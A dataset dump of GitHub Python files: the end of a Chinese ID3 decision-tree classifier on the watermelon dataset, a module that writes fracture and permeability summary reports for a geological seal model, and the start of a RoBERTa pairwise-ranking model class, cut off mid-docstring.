labels_full[labels[i]] = uniqueLabel\r\n\r\n return dataSet, labels, labels_full\r\n\r\n\r\n# 多叉树\r\nclass BTreeNode(object):\r\n def __init__(self, parent=None, keyword=None, child_nodes=[]):\r\n '''parent:上一层划分属性的具体属性值,如:”浅白“\r\n keyeyword:此节点的划分属性或label,如:“颜色”\r\n child_nodes:根据此节点属性的不同属性值划分的子节点集'''\r\n self.parent = parent\r\n self.keyword = keyword\r\n self.child_nodes = child_nodes\r\n\r\n def getkeyword(self):\r\n return self.keyword\r\n\r\n def addchild(self, node):\r\n self.child_nodes.append(node)\r\n\r\n def setkeyword(self, keyword):\r\n self.keyword = keyword\r\n\r\n def setparent(self, parent):\r\n self.parent = parent\r\n\r\n def shownode(self):\r\n print(\"parent:{}\\nkeyword:{}\\nchild_nodes: \".format(self.parent, self.keyword))\r\n for node in self.child_nodes:\r\n print(node.parent, node.keyword)\r\n print()\r\n\r\n\r\n# 计算信息熵\r\ndef Entropy(pk: float) -> float:\r\n if pk == 0.0: return 0.0\r\n return -1 * pk * math.log(pk, 2)\r\n\r\n\r\n# 计算信息增益\r\ndef Gain(D: List[int], Ent: float) -> float:\r\n G = Ent\r\n for Dv in D:\r\n G -= abs(Dv / sum(D)) * Entropy(Dv / sum(D))\r\n return G\r\n\r\n\r\n# 获取最佳划分属性\r\ndef BestAttribute(dataSet_, labels_, labels_full_):\r\n # 根节点信息熵计算\r\n temp = []\r\n D_t = [0, 0]\r\n for i, data in enumerate(dataSet_):\r\n temp.append(i + 1)\r\n if data[-1] == '好瓜':\r\n D_t[0] += 1\r\n if data[-1] == '坏瓜':\r\n D_t[1] += 1\r\n Ent = Entropy(D_t[0] / len(temp)) + Entropy(D_t[1] / len(temp))\r\n\r\n # 初始化样本集和信息熵列表\r\n Gains = []\r\n for ind, label in enumerate(labels_):\r\n l = len(labels_full_[label])\r\n G = Ent\r\n label_t = list(labels_full_[label])\r\n D = []\r\n Ents = []\r\n for i in range(l):\r\n D.append([])\r\n Ents.append(0)\r\n\r\n # 按属性划分Dv\r\n for i, data in enumerate(dataSet_):\r\n attribute_ind = label_t.index(data[ind])\r\n D[attribute_ind].append(i + 1)\r\n\r\n # 计算Dv中各类别数量\r\n Dv = []\r\n for i in D:\r\n temp = [0, 0]\r\n for j in i:\r\n if dataSet_[j - 1][-1] == '好瓜':\r\n temp[0] += 1\r\n if dataSet_[j - 1][-1] == '坏瓜':\r\n temp[1] += 1\r\n Dv.append(temp)\r\n\r\n # 计算信息熵\r\n for i, data in enumerate(Dv):\r\n good, bad = data\r\n total = good + bad\r\n if total != 0:\r\n Ents[i] = Entropy(good / total) + Entropy(bad / total)\r\n\r\n # 计算信息增益\r\n for i, data in enumerate(Ents):\r\n G -= (Dv[i][0] + Dv[i][1]) / len(dataSet_) * data\r\n Gains.append(G)\r\n\r\n # 寻找最大信息熵的属性\r\n label_num = 0\r\n for i, g in enumerate(Gains):\r\n if g > Gains[label_num]:\r\n label_num = i\r\n\r\n return labels_[label_num], Gains[label_num]\r\n\r\n\r\n# 若全为同一类别,返回此类叶结点\r\ndef SameClass(dataset_):\r\n # 若全为同一类别,返回此类叶结点\r\n label = ''\r\n same_class = True\r\n for i, data in enumerate(dataset_):\r\n if i == 0:\r\n continue\r\n if data[-1] != dataset_[i - 1][-1]:\r\n same_class = False\r\n break\r\n if same_class:\r\n label = dataset_[0][-1]\r\n\r\n return same_class, label\r\n\r\n\r\n# 属性为空 或 样本在属性上取值相同\r\ndef NoneOrSameattr(dataset_, labels_):\r\n if labels_ != []:\r\n for i in range(len(dataset_)-2):\r\n for j in range(i+1, len(dataset_)-1):\r\n if dataset_[i][:-1] != dataset_[j][:-1]:\r\n return False\r\n\r\n return True\r\n\r\n\r\n# 返回最多类别\r\ndef MostClass(dataset_):\r\n good, bad = 0, 0\r\n for data in dataset_:\r\n if data[-1] == '好瓜':\r\n good += 1\r\n if data[-1] == '坏瓜':\r\n bad += 1\r\n label = '好瓜' if good >= bad else '坏瓜'\r\n\r\n return label\r\n\r\n\r\n# 对属性划分后不同子集继续生成分支结点\r\ndef GetSubNode(dataset_, labels_, labels_full_, best_attr):\r\n root = BTreeNode(keyword=best_attr)\r\n subnodes = []\r\n ind = labels_.index(best_attr)\r\n # 根据划分属性的不同属性值,对不同属性值的子集进行子树生成\r\n for attr in labels_full_[best_attr]:\r\n subtree = BTreeNode()\r\n subdataset = []\r\n for i, data in enumerate(dataset_):\r\n if data[ind] == attr:\r\n temp = copy(data)\r\n temp.pop(ind)\r\n subdataset.append(temp)\r\n\r\n # 该属性值子集为空,设为样本最多的类别\r\n if not subdataset:\r\n label = MostClass(dataset_)\r\n subtree.setkeyword(label)\r\n\r\n # 该属性值子集不为空,继续进行子决策树生成\r\n else:\r\n sublabels_full = copy(labels_full_)\r\n if best_attr in sublabels_full:\r\n sublabels_full.pop(best_attr)\r\n\r\n sublabels = copy(labels_)\r\n if best_attr in sublabels:\r\n sublabels.remove(best_attr)\r\n\r\n subtree = TreeGenerate(subdataset, sublabels, sublabels_full)\r\n\r\n subtree.setparent(attr)\r\n subnodes.append(subtree)\r\n\r\n return subnodes\r\n\r\n\r\n# 生成决策树\r\ndef TreeGenerate(dataset_, labels_, labels_full_):\r\n root = BTreeNode()\r\n # 若全为同一类别,返回此类叶结点\r\n flag, label = SameClass(dataset_)\r\n if flag:\r\n root.setkeyword(label)\r\n return root\r\n\r\n # 属性为空 或 样本在属性上取值相同,返回最多类别\r\n if NoneOrSameattr(dataset_, labels_):\r\n label = MostClass(dataset_)\r\n root.setkeyword(label)\r\n return root\r\n\r\n # 选择最优划分属性\r\n best_attr, gain = BestAttribute(dataset_, labels_, labels_full_)\r\n root.setkeyword(best_attr)\r\n\r\n # 对属性划分后不同子集继续生成分支结点\r\n root.child_nodes = GetSubNode(dataset_, labels_, labels_full_, best_attr)\r\n return root\r\n\r\n\r\n# 决策树预测\r\ndef test(data, dataset, label, labels_full, tree):\r\n res = ''\r\n # 遍历决策树,直到得到label\r\n while res not in ['坏瓜', '好瓜']:\r\n # 获取划分属性\r\n attr_divide = tree.keyword\r\n ind = label.index(attr_divide)\r\n\r\n for node in tree.child_nodes:\r\n #根据属性值进行划分\r\n if node.parent == data[ind]:\r\n tree = node\r\n res = node.keyword\r\n break\r\n\r\n return res\r\n\r\n\r\n\r\nif __name__ == '__main__':\r\n dataSet, labels, labels_full = createDataSet()\r\n tree = TreeGenerate(dataSet, labels, labels_full)\r\n pt.createPlot(tree)\r\n data = ['青绿', '蜷缩', '浊响', '清晰', '凹陷', '硬滑', '好瓜']\r\n print(test(data, dataSet, labels, labels_full, tree))\r\n","repo_name":"One1h/DecisionTree","sub_path":"DecisionTree.py","file_name":"DecisionTree.py","file_ext":"py","file_size_in_byte":9168,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"52"} +{"seq_id":"17627377523","text":"from datetime import datetime # For time stamp\nimport numpy as np # For array operations\n\nimport seal_config as scfg # IO directory and file names\nimport seal_file as sfile # Error in file operations\nimport seal_units as sun # Unit conversion\n\n# Constants for file handling\nOUTPUT_COLS = 8 # Columns for output\nCONFIG = 11.3 # Output format\n\n# Constants for writing\nLINER_2 = (\" \" + \"*\" * 60) # Line across page\nINTRO = \"\\n >>> \" # Line start\nPARA = \"\\n > \" # Indent at paragraph start\nIDNT = \" --> \" # Indent at item start\nSPEC = \" \" # General indent\n\n# Debug constants\nECHO = False # Print averages for each block\n\n\ndef write_frac_run_parameters(cast, frac_controls):\n \"\"\"Print basic model info to file named \"cast\".\n\n Parameters\n ----------\n cast = (str) file label\n frac_controls = (dict) dictionary of fracture parameters\n\n Returns\n -------\n None\n \"\"\"\n # Print header for printout.\n print(\"\\n FRACTURE GENERATION RUN\", file=cast)\n\n # Print run details.\n print(PARA + \"Model Parameters\", file=cast)\n print(IDNT + f'Analysis Title = {frac_controls.get(\"title\"):<}', file=cast)\n\n # return None\n\n\ndef write_frac_controls(cast, frac_controls):\n \"\"\"Print region data and controls to file named \"cast\".\n\n Parameters\n ----------\n cast = (str) file label\n frac_controls = (dict) dictionary of fracture parameters\n\n Returns\n -------\n None\n \"\"\"\n # Print header for input controls used.\n print(PARA + \"Controls:\", file=cast)\n\n # Print input random-fracture generation control.\n if frac_controls.get('random_approach'):\n print(IDNT + \"Random Option: Random Fractures Generated\", file=cast)\n else:\n print(IDNT + \"Random Option: Random Fractures NOT Generated\",\n file=cast)\n\n # Print user-fractures control.\n if frac_controls.get('user_approach'):\n print(IDNT + \"Input Option: Fractures Read from File.\",\n file=cast)\n else:\n print(IDNT + \"Input Option: Fractures NOT Read from File.\",\n file=cast)\n\n # Print aperture correlation control.\n if frac_controls.get('correlate_approach'):\n print(IDNT + \"Aperture Option: Apertures from Length Correlation.\",\n file=cast)\n else:\n print(IDNT + \"Aperture Option: Apertures Generated Stochastically.\",\n file=cast)\n\n # Print pressure-aperture control.\n if frac_controls.get('pressure_approach'):\n print(IDNT + \"Pressure-Aperture Option: Correction Applied.\",\n file=cast)\n else:\n print(IDNT + \"Pressure-Aperture Option: Not Used.\",\n file=cast)\n\n # Print header for connectivity factor.\n print(PARA + \"General:\", file=cast)\n # Print vertical connectivity parameter.\n print(IDNT + 'Fracture Connectivity Factor = '\n f'{frac_controls.get(\"connect_factor\"):.4} ', file=cast)\n\n # return None\n\n\ndef write_stochastic_parameters(cast, frac_controls, uts, si_units):\n \"\"\"Print first part stochastic fracture data to file named \"cast\".\n\n Parameters\n ----------\n cast = (str) file label\n frac_controls = (dict) dictionary of fracture parameters\n uts[] = (list of str) units for parameters\n si_units = (bool) control to convert SI to English/US units\n\n Returns\n -------\n None\n \"\"\"\n # Get numeric density & length values.\n ave_density = frac_controls.get('density_ave')\n min_density = frac_controls.get('density_min')\n max_density = frac_controls.get('density_max')\n ave_length = frac_controls.get('length_ave')\n std_length = frac_controls.get('length_dev')\n min_length = frac_controls.get('length_min')\n max_length = frac_controls.get('length_max')\n\n # Recast units for English/US output.\n if not si_units:\n ave_density *= sun.per_sqm_to_per_sft()\n min_density *= sun.per_sqm_to_per_sft()\n max_density *= sun.per_sqm_to_per_sft()\n ave_length *= sun.meters_to_feet()\n std_length *= sun.meters_to_feet()\n min_length *= sun.meters_to_feet()\n max_length *= sun.meters_to_feet()\n\n # --------------------------------------------------\n # Print density parameters.\n print(PARA + 'Density - Triangular Distribution', file=cast)\n print(IDNT + f'Average Fracture Density = {ave_density:.5e} //'\n + uts[5], file=cast)\n print(IDNT + f'Minimum Fracture Density = {min_density:.5e} //'\n + uts[5], file=cast)\n print(IDNT + f'Maximum Fracture Density = {max_density:.5e} //'\n + uts[5], file=cast)\n\n # Print orientation parameters.\n print(PARA + 'Orientation - von Mises Distribution', file=cast)\n print(IDNT + 'Average Fracture Orientation = '\n f'{frac_controls.get(\"orient_mu\"):.2f} degrees', file=cast)\n print(IDNT + 'Orientation Spread - 2 Sigma = '\n f'{frac_controls.get(\"orient_sigma\"):.2f} degrees', file=cast)\n\n # Print length parameters - depending on function type.\n if frac_controls['length_approach'] == 'POWER':\n print(PARA + \"Length - Power-Law Distribution\", file=cast)\n print(IDNT + 'Power-Law Exponent = '\n f'{frac_controls.get(\"length_eta\"):.3f}', file=cast)\n else:\n print(PARA + 'Length - Censored Log-Normal Distribution', file=cast)\n print(IDNT + 'Average Fracture Length = '\n f'{ave_length:.2f} ' + uts[0], file=cast)\n print(IDNT + 'Standard Deviation in Length = '\n f'{std_length:.3f} ' + uts[0], file=cast)\n\n # Print remaining length parameters common to both functions.\n print(IDNT + 'Minimum Fracture Length = '\n f'{min_length:.1f} ' + uts[0], file=cast)\n print(IDNT + 'Maximum Fracture Length = '\n f'{max_length:.1f} ' + uts[0], file=cast)\n\n # return None\n\n\ndef write_more_stochastic_parameters(cast, frac_controls, uts, si_units):\n \"\"\"Print part 2 stochastic fracture data to file named \"cast\".\n\n Parameters\n ----------\n cast = (str) file label\n frac_controls = (dict) dictionary of fracture parameters\n uts[] = (list of str) units for parameters\n si_units = (bool) control to convert SI to English/US units\n\n Returns\n -------\n None\n \"\"\"\n # Get numeric values.\n ave_aperture = frac_controls.get('aperture_ave')\n dev_aperture = frac_controls.get('aperture_dev')\n min_aperture = frac_controls.get('aperture_min')\n max_aperture = frac_controls.get('aperture_max')\n entry_stress = frac_controls.get('entry_pressure')\n\n # Recast units for English/US printout.\n if si_units:\n entry_stress *= sun.pa_to_mpa()\n else:\n ave_aperture *= sun.mm_to_inch()\n dev_aperture *= sun.mm_to_inch()\n min_aperture *= sun.mm_to_inch()\n max_aperture *= sun.mm_to_inch()\n entry_stress *= sun.pa_to_psi()\n\n # ----------------------------------------\n # Print aperture parameters.\n if frac_controls['correlate_approach']:\n print(PARA + 'Aperture-Length Correlation Factors', file=cast)\n\n print(IDNT + 'Aperture Correlation - Alpha = '\n f'{frac_controls.get(\"aperture_alpha\"):.2f} ', file=cast)\n print(IDNT + 'Aperture Correlation - Beta = '\n f'{frac_controls.get(\"aperture_beta\"):.4f} '\n + uts[8], file=cast)\n\n else:\n print(PARA + 'Aperture - Censored Log-Normal Distribution',\n file=cast)\n print(IDNT + 'Average Fracture Aperture = '\n f'{ave_aperture:.4e} ' + uts[8], file=cast)\n print(IDNT + 'Standard Deviation in Aperture = '\n f'{dev_aperture:.4e} ' + uts[8], file=cast)\n print(IDNT + 'Minimum Fracture Aperture = '\n f'{min_aperture:.4e} ' + uts[8], file=cast)\n print(IDNT + 'Maximum Fracture Aperture = '\n f'{max_aperture:.4e} ' + uts[8], file=cast)\n\n # Threshold printout.\n print(PARA + 'Threshold References', file=cast)\n print(IDNT + 'Reference Threshold Pressure = '\n f'{entry_stress:.3e} ' + uts[1], file=cast)\n\n # return None\n\n\ndef write_pressure_parameters(cast, frac_controls, uts, si_units):\n \"\"\"Print pressure-approach data to file named \"cast\".\n\n Parameters\n ----------\n cast = (str) file label\n frac_controls = (dict) dictionary of fracture parameters\n uts[] = (list of str) units for parameters\n si_units = (bool) control to convert SI to English/US units\n\n Returns\n -------\n None\n \"\"\"\n # Pressure-aperture correction parameters.\n if frac_controls['pressure_approach']:\n\n # Define variables for pressure-aperture.\n resid_aperture = frac_controls.get('residual_aperture')\n wide_aperture = frac_controls.get('wide_aperture')\n limit_pressure = frac_controls.get('stress_limit')\n theta_value = frac_controls.get('theta_aperture')\n\n # Define units for printout.\n if si_units:\n limit_pressure *= sun.pa_to_mpa()\n else:\n limit_pressure *= sun.pa_to_psi()\n resid_aperture *= sun.mm_to_inch()\n wide_aperture *= sun.mm_to_inch()\n\n # Print parameters.\n print(PARA + \"Pressure Aperture Parameters\",\n file=cast)\n print(IDNT + 'Residual Aperture = '\n f'{resid_aperture:.3e} ' + uts[8], file=cast)\n print(IDNT + 'Maximum Aperture = '\n f'{wide_aperture:.3e} ' + uts[8], file=cast)\n print(IDNT + 'Stress Limit - Non-Linear Curve = '\n f'{limit_pressure:.3e} ' + uts[1], file=cast)\n print(IDNT + 'Stiffness History Factor = '\n f'{theta_value:.3f} ', file=cast)\n\n # return None\n\n\ndef write_stochastic_options(cast, frac_controls, uts, si_units):\n \"\"\"Control the printout of summary fracture data to cast file.\n\n Parameters\n ----------\n cast = (str) file label\n frac_controls = (dict) dictionary of fracture parameters\n uts[] = (list - str) units for parameters\n si_units = (bool) control to convert English to SI units\n\n Returns\n -------\n None\n\n Notes\n -----\n 1. FRAC_SUM_FILE = Destination file name\n \"\"\"\n # Printer header for section.\n print(\"\\n\" + LINER_2, file=cast)\n print(PARA + \"Stochastic Parameters\", file=cast)\n\n if frac_controls.get(\"random_approach\"):\n # Print note that stochastic data were generated.\n print(PARA + 'Stochastic Fractures Were Generated.', file=cast)\n\n # Print stochastic data.\n write_stochastic_parameters(cast, frac_controls, uts,\n si_units)\n write_more_stochastic_parameters(cast, frac_controls, uts,\n si_units)\n write_pressure_parameters(cast, frac_controls, uts,\n si_units)\n else:\n # No stochastic parameters.\n print(PARA + 'No Stochastic Fractures Were Generated.',\n file=cast)\n\n # return\n\n\ndef write_defined_fractures(cast, frac_controls):\n \"\"\"Print user input fracture data to file named \"cast\".\n\n Parameters\n ----------\n cast = (str) file label\n frac_controls = (dict) dictionary of fracture parameters\n\n Returns\n -------\n None\n \"\"\"\n # Print section header.\n print(\"\\n\" + LINER_2, file=cast)\n print(PARA + 'User Defined Fractures', file=cast)\n\n # Print User Data - if used.\n if frac_controls.get('user_approach'):\n\n if frac_controls.get('user_fractures') > 0:\n print(IDNT + \"User Fractures Were Read from File.\", file=cast)\n print(PARA + \"User Defined Fractures:\", file=cast)\n print(IDNT + 'Source File in Input = '\n f'{frac_controls.get(\"input_source\")}', file=cast)\n print(IDNT + 'Number of Fracture Lines Input = '\n f'{int(frac_controls.get(\"user_fractures\")):6d}', file=cast)\n else:\n print(PARA + \"No User Fractures Were Found in File.\", file=cast)\n else:\n print(IDNT + \"User Fractures Were Not Read from File.\", file=cast)\n\n # return None\n\n\ndef write_rock_data(cast, frac_controls, uts, si_units):\n \"\"\"Print matrix permeability values to file named \"cast\".\n\n Parameters\n ----------\n cast = (str) file label\n frac_controls = (dict) dictionary of fracture parameters\n uts[] = (list of str) units for parameters\n si_units = (bool) control to convert English to SI units\n\n Returns\n -------\n None\n \"\"\"\n # Print matrix parameters in microdarcies.\n print(\"\\n\" + LINER_2, file=cast)\n print(PARA + \"Matrix Permeability\", file=cast)\n print(PARA + \"Matrix Stochastic Parameters:\", file=cast)\n print(IDNT + \"Permeability Generated from Censored Normal Distribution.\",\n file=cast)\n print(IDNT + 'Average Matrix Permeability = '\n f'{frac_controls.get(\"rock_perm_ave\"):.4e} mD', file=cast)\n print(IDNT + 'Standard Deviation in Permeability = '\n f'{frac_controls.get(\"rock_perm_dev\"):.4e} mD', file=cast)\n print(IDNT + 'Minimum Matrix Permeability = '\n f'{frac_controls.get(\"rock_perm_min\"):.4e} mD', file=cast)\n print(IDNT + 'Maximum Matrix Permeability = '\n f'{frac_controls.get(\"rock_perm_max\"):.4e} mD', file=cast)\n\n # Print reference parameters.\n print(PARA + \"Matrix Reference Parameters\", file=cast)\n print(IDNT + 'Ref. Matrix Permeability = '\n f'{frac_controls.get(\"ref_matrix_perm\"):.4e} mD', file=cast)\n\n pressure = frac_controls.get('ref_matrix_threshold')\n if si_units:\n pressure *= sun.pa_to_mpa()\n else:\n pressure *= sun.pa_to_psi()\n print(IDNT + 'Ref. Matrix Threshold Pressure = '\n f'{pressure:.1e} ' + uts[1], file=cast)\n\n # return None\n\n\ndef write_translated_controls(cast, frac_controls):\n \"\"\"Print user translated lognormal data to file named \"cast\".\n\n Parameters\n ----------\n cast = (str) file label\n frac_controls = (dict) dictionary of fracture parameters\n\n Returns\n -------\n None\n \"\"\"\n # Print stochastic parameters of Normal distributions.\n print(\"\\n\" + LINER_2, file=cast)\n print(PARA + \"Translated Log-Normal Distribution Parameters\", file=cast)\n print(SPEC + \"- Values Computed Internally by Code.\", file=cast)\n\n # Print length and aperture parameters - if generated.\n if frac_controls.get('random_approach'):\n\n # Print length parameters if log-normal distribution.\n if frac_controls['length_approach'] == 'LOGNORM':\n print(PARA + 'Length Log-Normal Distribution Parameters:',\n file=cast)\n print(IDNT + 'Length - Mu Value = '\n f'{frac_controls.get(\"length_mu\"):.6f}', file=cast)\n print(IDNT + 'Length - Sigma Value = '\n f'{frac_controls.get(\"length_scale\"):.6f}', file=cast)\n\n # Print aperture parameters - if used.\n if not frac_controls.get(\"correlate_approach\"):\n print(PARA + 'Aperture Log-Normal Distribution Parameters:',\n file=cast)\n print(IDNT + 'Aperture - Mu Value = '\n f'{frac_controls.get(\"aperture_mu\"):.6f}', file=cast)\n print(IDNT + 'Aperture - Sigma Value = '\n f'{frac_controls.get(\"aperture_scale\"):.6f}', file=cast)\n\n # Print matrix permeability parameters.\n print(PARA + 'Matrix Log-Normal Distribution Parameters:',\n file=cast)\n print(IDNT + 'Matrix Permeability - Mu Value = '\n f'{frac_controls.get(\"rock_perm_mu\"):.6f}', file=cast)\n print(IDNT + 'Matrix Permeability - Sigma Value = '\n f'{frac_controls.get(\"rock_perm_scale\"):.6f}', file=cast)\n\n # return None\n\n\ndef write_time(cast, elapsed_time):\n \"\"\"Write run time in simple format.\n\n Parameters\n ----------\n cast = (str) file label for output - summary file\n elapsed_time = (float) delta time value for run\n\n Returns\n -------\n None\n \"\"\"\n # compute time values for delta time in seconds.\n seconds = int(elapsed_time.total_seconds())\n hours, remainder = divmod(seconds, 3600)\n minutes, secs = divmod(remainder, 60)\n milli_secs = int(elapsed_time.microseconds / 1000)\n\n # Write time in design format.\n print(INTRO + 'Fracture Execution Time = '\n f'{int(hours):02}:{int(minutes):02}:'\n f'{int(secs):02}.{int(milli_secs):03} (hh:mm:ss:ms)',\n file=cast, flush=True)\n\n # return None\n\n\ndef write_completed(cast, frac_controls):\n \"\"\"Print end parameters info to file named \"cast\".\n\n Parameters\n ----------\n cast = (str) file label\n frac_controls = (dict) dictionary of fracture parameters\n\n Returns\n -------\n None\n \"\"\"\n # Print separator.\n print(\"\\n\" + LINER_2, file=cast)\n\n # Print version number.\n print(PARA + 'Seal Flux / Frac Version Number = '\n f'{frac_controls.get(\"version\"):<}', file=cast)\n\n # Print date.\n now = datetime.now()\n clump = \" > \" + \"Run Date: %a %d %b %Y - Time: %H:%M\"\n stamp = now.strftime(clump)\n print(stamp, file=cast)\n\n # Closing line.\n print(\"\\n End\", file=cast)\n\n # return None\n\n\ndef write_frac_summary(frac_controls, alive, x_method, uts, si_units):\n \"\"\"Control the printout of summary fracture data to cast file.\n\n Parameters\n ----------\n frac_controls = (dict) dictionary of fracture parameters\n alive = (bool) stand-alone run\n x_method = (bool) condition if fracture method was used\n uts[] = (list - str) units for parameters\n si_units = (bool) control to convert English to SI units\n\n Returns\n -------\n None\n\n Notes\n -----\n 1. FRAC_SUM_FILE = Destination file name\n \"\"\"\n if x_method:\n # Construct full path to results directory and summary file.\n sub_path, destination = sfile.get_path_name(scfg.OUTPUT_DIRECTORY,\n scfg.FRAC_SUM_FILE,\n scfg.EXTENSION_TXT)\n\n # Write information to file on fracture analysis.\n try:\n with open(destination, 'w', encoding=\"utf8\") as cast:\n\n # Print run information.\n write_frac_run_parameters(cast, frac_controls)\n write_frac_controls(cast, frac_controls)\n\n # Write stochastic data.\n write_stochastic_options(cast, frac_controls, uts, si_units)\n\n # Write user and matrix parameters.\n write_defined_fractures(cast, frac_controls)\n write_rock_data(cast, frac_controls, uts, si_units)\n\n # Write derived parameters and time.\n write_translated_controls(cast, frac_controls)\n write_completed(cast, frac_controls)\n\n except OSError as err:\n sfile.io_snag(err, sub_path, scfg.FRAC_SUM_FILE)\n\n if alive:\n sfile.echo_status(alive, \"CREATED FRACTURE SUMMARY FILE.\")\n\n # return None\n\n\n# **** DEBUGGING ROUTINES *******\n\n\ndef write_overall_results(cast, frac_controls, data_list):\n \"\"\"For debugging, print averages for each block to the file \"cast.\n\n Parameters\n ----------\n cast = (str) file label\n frac_controls = (dict) dictionary of fracture parameters\n data_list = (list) list results -> for each group:\n =[0] for random fractures\n =[1] for user fractures\n =[2] for matrix\n\n Returns\n -------\n None\n\n Notes\n -----\n 1. See function \"compute_ave_terms\" for key to data_list\n \"\"\"\n # Define loop control for each case (random and/or user fractures).\n ender = 2\n if data_list[0]:\n starter = 0\n if data_list[1]:\n ender = 2\n else:\n ender = 1\n else:\n starter = 1\n if not data_list[1]:\n starter = 2 # Will skip loop if start = end\n\n # Define header for each case.\n for numbr in range(starter, ender):\n # Control parameters for loop.\n if numbr == 0:\n header = PARA + \"Average Parameters for Random Fracture per Grid\"\n frac_info = np.asarray(data_list[0])\n else:\n print(file=cast)\n header = \"n > Average Parameters for User Fracture per Grid\"\n frac_info = np.asarray(data_list[1])\n\n # Print block data for each case (reverse loop).\n print(header, file=cast)\n for indx in range(frac_controls['num_cells']):\n # Define block number.\n bloc_id = f'[ {indx} ]'\n bloc_id = PARA + \"Average Data for Cell \" + bloc_id\n print(bloc_id, file=cast)\n print(IDNT + 'Number of Fractures in Element = '\n f'{frac_info[indx, 5]:6d}', file=cast)\n print(IDNT + 'Average Aperture - All = '\n f'{frac_info[indx, 0]:.3g} mm', file=cast)\n print(IDNT + 'Average Length - All = '\n f'{frac_info[indx, 1]:.1f} m', file=cast)\n print(IDNT + 'Average Strike - All = '\n f'{frac_info[indx, 2]:.1f} deg', file=cast)\n print(IDNT + 'Average Transmissivity - All = '\n f'{frac_info[indx, 3]:.3g} m^4', file=cast)\n print(IDNT + 'Average Threshold - All = '\n f'{frac_info[indx, 4]:.3g} Pa', file=cast)\n print(IDNT + 'Permeability = '\n f'{frac_info[indx, 6]:.3g} mD', file=cast)\n\n # return None\n\n\ndef write_list(cast, header, data_list):\n \"\"\"Print list in arbitrary format to \"cast\" file.\n\n Parameters\n ----------\n cast = (str) file label for output\n header = (str) title of data\n data_list = (list) list for output to summary file\n\n Returns\n -------\n None\n\n Notes\n -----\n 1. NumPy print functions will not print all elements or larger\n arrays vertically or laterally. Therefore, this compromise\n was developed for pretty printing.\n \"\"\"\n # Compute the number of lines and the \"remainder\" columns on last line.\n columns = OUTPUT_COLS\n n_lines, remainder = divmod(len(data_list), columns)\n\n # Setup format and controls.\n pattern = f' {{:{CONFIG}e}}'\n typ_line = '\\n'.join(pattern * columns for _ in range(n_lines))\n last_line = pattern * remainder\n\n # Print data with formatting.\n print(IDNT + header, file=cast)\n print(typ_line.format(*data_list), file=cast)\n print(last_line.format(*data_list[n_lines*columns:]), file=cast)\n\n # return None\n\n\ndef write_sections(cast, frac_controls, data_list):\n \"\"\"Print permeability and threshold of each grid to \"cast\" file.\n\n Parameters\n ----------\n cast = (str) file label for output - summary file\n frac_controls = (dict) dictionary of fracture parameters\n data_list = (list) list results -> for each group:\n =[0] for random fractures\n =[1] for user fractures\n =[2] for matrix\n\n Returns\n -------\n None\n \"\"\"\n # Setup for lists.\n list_perm = []\n list_threshold = []\n total = frac_controls['num_cells']\n\n # Write random fracture data, if fracture data present.\n if data_list[0]:\n print(PARA + \"Grid Parameters for Random Fractures:\", file=cast)\n\n # Create sub-lists for printing threshold and permeability.\n for indx in range(0, total):\n list_threshold.append(data_list[0][indx][4])\n list_perm.append(data_list[0][indx][6])\n\n # Print sublists in row/column format.\n header = \"Equivalent Permeability (microdarcys)\"\n write_list(cast, header, list_perm)\n\n header = \"Average Threshold Pressures (Pa)\"\n write_list(cast, header, list_threshold)\n\n if data_list[1]:\n print(PARA + \"Grid Parameters for User Fractures:\", file=cast)\n\n # Create sub-lists.\n list_perm.clear()\n list_threshold.clear()\n for indx in range(0, total):\n list_threshold.append(data_list[1][indx][4])\n list_perm.append(data_list[1][indx][6])\n\n # Print sublists in row/column format.\n header = \"Equivalent Permeability (microdarcys)\"\n write_list(cast, header, list_perm)\n\n header = \"Average Threshold Pressures (Pa)\"\n write_list(cast, header, list_threshold)\n\n if data_list[2]:\n print(PARA + \"Grid Parameters for Matrix:\", file=cast)\n\n # Create sub-lists.\n list_perm.clear()\n list_threshold.clear()\n for indx in range(0, total):\n list_perm.append(data_list[2][indx][0])\n list_threshold.append(data_list[2][indx][1])\n\n # Print sublists in row/column format.\n header = \"Equivalent Permeability (microdarcys)\"\n write_list(cast, header, list_perm)\n\n header = \"Average Threshold Pressures (Pa)\"\n write_list(cast, header, list_threshold)\n\n # return None\n\n\ndef write_data_results(frac_controls, data_list, sim_numbr):\n \"\"\"Write results to file.\n\n Parameters\n ----------\n frac_controls = (dict) dictionary of fracture parameters\n data_list = (list) stochastic parameters from each block for each case\n sim_numbr = (int) current simulation number\n\n Returns\n -------\n None\n \"\"\"\n # Construct unique file name for saving data.\n output_file = scfg.FRAC_NAME + str(sim_numbr + 1) + scfg.EXTENSION_TXT\n\n # Construct full path to results directory and summary file.\n _, destination = sfile.get_path_name(scfg.OUTPUT_DIRECTORY, output_file,\n scfg.EXTENSION_TXT)\n\n # Write information to file on seal run.\n try:\n with open(destination, 'w', encoding=\"utf8\") as cast:\n\n # Print current time stamp for printout.\n print(\"\\n Fracture Summary\", file=cast)\n now = datetime.now()\n clump = IDNT + \"Simulation Run Date: %a %d %b %Y - Time: %H:%M\"\n stamp = now.strftime(clump)\n print(stamp, file=cast)\n\n # Print general information on run; add 1 to sim.\n print(IDNT + 'Analysis Title = '\n f'{frac_controls.get(\"title\"):<}', file=cast)\n print(IDNT + 'Simulation Number = '\n f'{(sim_numbr + 1):4d}', file=cast)\n\n # Print emphasis for output.\n print(\"\\n\" + LINER_2, file=cast)\n print(\" Results of Analysis ---------------------\", file=cast)\n print(LINER_2, file=cast)\n\n # Debug: Print fracture data for options selected, if desired.\n if ECHO:\n write_overall_results(cast, frac_controls, data_list)\n\n # Print results for each category.\n write_sections(cast, frac_controls, data_list)\n\n # Print current execution time at end using simple HH:MM:SS format.\n write_time(cast, frac_controls['elapsed'])\n\n except OSError as err:\n sfile.io_snag(err, scfg.OUTPUT_DIRECTORY, output_file)\n\n # return None\n\n\n#\n# -----------------------------------------------------------------------------\n# - End of module\n","repo_name":"equinor/NRAP-Open-IAM_GH","sub_path":"source/components/seal/frac_view.py","file_name":"frac_view.py","file_ext":"py","file_size_in_byte":27428,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"74149507045","text":"from torch import nn\nfrom transformers import RobertaPreTrainedModel, RobertaModel\n\n\nclass RobertaForPairwiseLearning(RobertaPreTrainedModel):\n \"\"\"\n BERT based model for pairwise learning. It expects both the and the \n for doing the forward pass. The loss is cross-entropy for the difference between positive_doc and negative_doc\n scores (labels are 1 if score positive_neg > score negative_doc otherwise 0) based on\n \"Learning to Rank using Gradient Descent\" 2005 ICML.\n 